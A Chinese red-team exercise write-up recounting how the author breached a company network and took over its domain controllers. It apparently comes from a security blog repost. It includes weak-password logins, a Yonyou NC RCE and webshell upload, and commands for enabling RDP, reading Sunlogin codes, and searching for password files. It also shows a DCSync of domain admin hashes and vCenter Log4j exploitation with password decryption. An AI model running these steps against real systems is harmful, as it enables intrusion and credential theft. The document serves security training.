攻防演练 | 记一次打穿xx公司域控

admin
admin
admin
139018
文章
114
评论
2023年7月30日23:46:21评论17 views字数 3935阅读13分7秒阅读模式

外网打点

资产识别

使用 Ehole 快速识别重点资产链接:https://github.com/EdgeSecurityTeam/EHole

攻防演练 | 记一次打穿xx公司域控

PYTHON

Ehole.exe -fofa 检测的域名

攻防演练 | 记一次打穿xx公司域控

寻找口子

1、每个网站可以尝试默认密码或’admin’、1qazxsw2==== 等类似弱口令

这里通过 sysadmin/1 成功登入泛微后台

攻防演练 | 记一次打穿xx公司域控

2、接着浏览其他站点,这里运气比较好发现了用友的 nday

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

3、访问接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令

攻防演练 | 记一次打穿xx公司域控

4、另外还存在用友 nc 任意文件上传漏洞,直接上哥斯拉

攻防演练 | 记一次打穿xx公司域控

内网渗透

杀软识别

PYTHON


 
tasklist /svc

攻防演练 | 记一次打穿xx公司域控

把之前准备好的 bypass360 马子扔上去,成功上线

攻防演练 | 记一次打穿xx公司域控

隧道搭建

ping 了一下发现机器出网,可以上 frp 搭建反向代理隧道

攻防演练 | 记一次打穿xx公司域控

proxifier 配置相应的端口账密便可以进入内网

攻防演练 | 记一次打穿xx公司域控

由于周六日没人防守,直接上 fscan 对各个 C 段开扫,发现网段里的弱口令或 web 漏洞,帮助我们拿下机器进一步横向,拿到机器后先做信息搜集,网段,机器信息,敏感文件,xshell、navicat 密码等常规的这里就不细说了

接着可以通过 mimikatz 抓取密码,抓不到明文也可以尝试到 cmd5 上进行破解,充值 100 块 100 条还是挺划算的,破解率较高,白嫖可以到这个网站 https://www.somd5.com

拿到机器的账号密码之后,若机器开启了 3389 端口可以选择 rdp 远程桌面过去,没开的话可以开启 3389 端口进行远程连接

PLAINTEXT


 
#执行以下命令操作注册表来开启机器3389远程桌面服务
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#执行以下命令操作注册表来关闭机器3389远程桌面服务 
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

#使用以下命令添加防火墙放行策略
netsh firewall add portopening protocol = TCP port = 3389 name = rdp

但如果是正常办公时间,贸然登录过去会很容易引起对方的发现,若进程中有 sunlogin 进程,可以读取识别码和验证码,通过向日葵连接相对比较隐蔽

攻防演练 | 记一次打穿xx公司域控

向日葵读取密码

PLAINTEXT

1
2
3
4
5
6
7
8
9
10
 
注册表读取配置信息:
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInfo
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo

向日葵默认配置文件路径:
安装版:C:Program FilesOraySunLoginSunloginClientconfig.ini
便携版:C:ProgramDataOraySunloginClientconfig.ini
本机验证码参数:encry_pwd
本机识别码参数:fastcode(去掉开头字母)
sunlogincode:判断用户是否登录状态

读注册表:

攻防演练 | 记一次打穿xx公司域控

读默认配置文件:

fastcode 去掉前面的数字 k 为本机识别码 278263893

攻防演练 | 记一次打穿xx公司域控

使用脚本进行解密获得本机验证码

攻防演练 | 记一次打穿xx公司域控

运维机

横向的时候优先拿运维机,一般运维机存储着大量的账号密码信息,比如这次无意中发现的运维机器是弱口令 administrator/111111

拿下后可通过运行 bat 收集服务器、网络拓扑、密码本、公司信息等重要文件。

HTML

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
dir /a /s /b d:"*.txt" 
dir /a /s /b d:"*.xml" 
dir /a /s /b d:"*.mdb" 
dir /a /s /b d:"*.sql" 
dir /a /s /b d:"*.mdf" 
dir /a /s /b d:"*.eml" 
dir /a /s /b d:"*.pst" 
dir /a /s /b d:"*conf*" 
dir /a /s /b d:"*bak*" 
dir /a /s /b d:"*pwd*" 
dir /a /s /b d:"*pass*" 
dir /a /s /b d:"*login*" 
dir /a /s /b d:"*user*"
dir /a /s /b c:password.txt
dir /a /s /b c:*.conf *.ini *.inc *.config 
dir /a /s /b c:conf.* config.* 
dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "拓扑"
dir /a /s /b c:*.conf *.ini *.inc *.config | findstr "运维"
dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "密码" >C:Users1.txt

最后收集了一堆密码本,可登录到各个重要系统,例如:

H3C 堡垒机

攻防演练 | 记一次打穿xx公司域控

gitlab 仓库

攻防演练 | 记一次打穿xx公司域控

禅道

攻防演练 | 记一次打穿xx公司域控

拿着密码本重新组合字典,对网段内的机器进行爆破,一般存在口令复用的情况,成功拿下几十台机器

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

获取域控

通过 fscan 扫描的时候可以检索 AD 关键字发现域控

PLAINTEXT

1
2
3
4
5
6
7
8
 
[*]192.168.10.38 #非真实域控ip
   [->]D1-Prod-AD-P01
   [->]192.168.10.38
   
[*]192.168.10.20 #非真实域控ip
   [->]AD
   [->]192.168.10.20

接着可以通过该机器是否开放 53 和 389 端口进行进一步确认

爆破成功的机器里发现其中一台为域内机器,刚好该机器存在域管进程,提权到 system 权限后 inject 到域管进程,通过 Dcsync 成功获取域管密码的 hash 值,其中一个被禁用的账户刚好是弱口令,解出明文密码并激活账户,成功登录两台域控机器,除此以外还可以尝试域漏洞、NTLM 中继、委派等

PLAINTEXT

1
2
3
4
5
 
net group "domain admins" /domain
dcsync domain xxxx
shell net user xxxx
shell net user xxxx /active:yes /domain

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

云管平台

通过运维机的 xshell 查找历史记录拿下了主备数据库,然后执行 sql 语句成功获取出了云管平台的 hash

攻防演练 | 记一次打穿xx公司域控

到 cmd5 上进行解密,一块钱拿下云管平台很划算

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

官网

通过云管平台登录官网机器,抓取浏览器密码成功获取后台密码

攻防演练 | 记一次打穿xx公司域控

Vcenter

在扫描的过程中发现几台 Vcenter,Vcenter 常规有三种打法,分别是 CVE-2021-22005-rce、2021-21972-uoloadova 接口 rce 和 log4j,前两个测试过没成功,log4j 通过 dnslog 探测漏洞存在,vcenter 的漏洞触发点在 xff 头部,这里可手工打或者使用 sp4ce 师傅的工具

https://github.com/NS-Sp4ce/Vm4J

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

但一般打完是非交互式 shell,没有回显,这里使用命令切换为交互式 shell

PLAINTEXT

1
 
python -c 'import pty;pty.spawn('/bin/bash')'

重置密码

PLAINTEXT

1
2
 
/usr/lib/vmware-vmdir/bin/vdcadmintool  #重置密码

不重置密码获取密码

https://github.com/shmilylty/vhost\_password\_ decrypt

PLAINTEXT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
#获取vc用户的密码
cat /etc/vmware-vpx/vcdb.properties

#把加密后的密码单独拿出来,
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
#改成这种格式
*H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==
*zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==
*Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==
*R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==

#拿解密key
cat /etc/vmware-vpx/ssl/symkey.dat
Windows:C:ProgramDataVMwarevCenterServercfgvmware-vpxsslsymkey.dat
Linux:/etc/vmware-vpx/ssl/symkey.dat

#破解
python decrypt.py symkey.dat password.enc pass.txt

然后就可以登入 web 控制台了,最后也是拿下了两台域控

攻防演练 | 记一次打穿xx公司域控

攻防演练 | 记一次打穿xx公司域控

来源:https://www.freebuf.com/articles/web/373114.html

原文始发于微信公众号(黄公子学安全):攻防演练 | 记一次打穿xx公司域控

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月30日23:46:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防演练 | 记一次打穿xx公司域控https://cn-sec.com/archives/1919692.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息